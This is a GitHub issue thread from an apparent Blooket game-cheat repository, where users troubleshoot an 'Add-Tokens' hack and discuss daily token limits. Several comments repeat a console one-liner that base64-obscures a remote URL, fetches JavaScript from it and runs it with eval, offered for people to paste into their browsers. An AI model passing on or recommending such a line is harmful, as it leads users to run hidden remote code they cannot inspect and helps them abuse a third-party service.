### ISSUE TITLE
Add-Tokens isn't working

### ISSUE THREAD

**Issue by XJSWAG** [glixzzy/blooket-hack#532]

**Comment by 3kh0** [comment]
**Hello there!**

Your issue is not complete and we can not tell the problem!<br>

Here are some questions you should answer when creating an issue:
- What browser do you use? 
- Are you on a school computer and/or connected to the school internet?
- Are you using a bookmarklet or are you pasting the code into the console?
- Has the code worked before?
- Is it the original code? This is what the original code would look like: `fetch(atob('aHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vc2Nob29sLWNoZWF0cy9yYXcvdXBsb2FkL3YxNjM3NDUyMjEzL2dsb2JhbFNwYW1PcGVuQm94ZXMuanM=')).then((res) => res.text().then((t) => eval(t)))`

Thank you for letting us know the issue! 😀

**Comment by Aquamarine110313** [comment]
it is working?

**Comment by Greenlio** [comment]
> **Hello there!**
> 
> Your issue is not complete and we can not tell the problem!
> 
> Here are some questions you should answer when creating an issue:
> 
> * What browser do you use?
> * Are you on a school computer and/or connected to the school internet?
> * Are you using a bookmarklet or are you pasting the code into the console?
> * Has the code worked before?
> * Is it the original code? This is what the original code would look like: `fetch(atob('aHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vc2Nob29sLWNoZWF0cy9yYXcvdXBsb2FkL3YxNjM3NDUyMjEzL2dsb2JhbFNwYW1PcGVuQm94ZXMuanM=')).then((res) => res.text().then((t) => eval(t)))`
> 
> Thank you for letting us know the issue! 😀

 bro calm down we aren't a business lol

**Comment by glixzzy** [comment]
if it works for me it works for everyone

**Comment by 3kh0** [comment]
> > **Hello there!**
> > Your issue is not complete and we can not tell the problem!
> > Here are some questions you should answer when creating an issue:
> > 
> > * What browser do you use?
> > * Are you on a school computer and/or connected to the school internet?
> > * Are you using a bookmarklet or are you pasting the code into the console?
> > * Has the code worked before?
> > * Is it the original code? This is what the original code would look like: `fetch(atob('aHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vc2Nob29sLWNoZWF0cy9yYXcvdXBsb2FkL3YxNjM3NDUyMjEzL2dsb2JhbFNwYW1PcGVuQm94ZXMuanM=')).then((res) => res.text().then((t) => eval(t)))`
> > 
> > Thank you for letting us know the issue! 😀
> 
> bro calm down we aren't a business lol

it helps to cut down blank issues.

**Comment by XJSWAG** [comment]
i think I accidentally did the script to early in the morning so maybe that is why it didn't work for me

**Comment by 3kh0** [comment]
> i think I accidentally did the script to early in the morning so maybe that is why it didn't work for me

If you go to your stats page [htttps://blooket.com/stats](https://www.blooket.com/stats) then look for the field that says `Daily Tokens Available` and you can use the hack when it has the number 500

![image](https://user-images.githubusercontent.com/58097612/144615820-627bea20-a4e5-41b4-bdb5-c3af4875d07c.png)

**Comment by donaldli2020** [comment]
works for me as long as i do only 500/d

**Comment by 3kh0** [comment]
> works for me as long as i do only 500/d

The max is 500, you can not do anymore than that

**Comment by donaldli2020** [comment]
> > i think I accidentally did the script to early in the morning so maybe that is why it didn't work for me
> 
> If you go to your stats page [htttps://blooket.com/stats](https://www.blooket.com/stats) then look for the field that says `Daily Tokens Available` and you can use the hack when it has the number 500
> 
> ![image](https://user-images.githubusercontent.com/58097612/144615820-627bea20-a4e5-41b4-bdb5-c3af4875d07c.png)

actually if > 0
